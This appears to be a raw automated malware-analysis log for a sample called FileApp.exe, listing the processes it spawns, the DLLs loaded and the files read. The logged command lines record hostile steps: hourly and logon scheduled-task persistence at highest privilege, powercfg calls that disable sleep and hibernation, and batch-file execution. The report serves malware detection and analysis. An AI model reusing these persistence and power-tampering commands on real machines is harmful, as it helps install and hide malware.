Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\FileApp.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: RegAsm.exe Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: FileApp.exe ReversingLabs: Detection: 23%
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\FileApp.exe "C:\Users\user\Desktop\FileApp.exe"
Source: C:\Users\user\Desktop\FileApp.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5644 -ip 5644
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 824
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Command Command.bat & Command.bat & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process created: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe "C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe"
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\jewkkwnf\jewkkwnf.exe C:\ProgramData\jewkkwnf\jewkkwnf.exe
Source: unknown Process created: C:\ProgramData\jewkkwnf\jewkkwnf.exe C:\ProgramData\jewkkwnf\jewkkwnf.exe
Source: unknown Process created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userFBKKJEBFID.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userEHJKFCGHID.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Source: C:\Users\user\Desktop\FileApp.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process created: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe "C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Command Command.bat & Command.bat & exit
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5644 -ip 5644
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 824
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userFBKKJEBFID.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userEHJKFCGHID.exe"
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf LG" /sc ONLOGON /rl HIGHEST
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process created: unknown unknown
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: apphelp.dll Jump to behavior
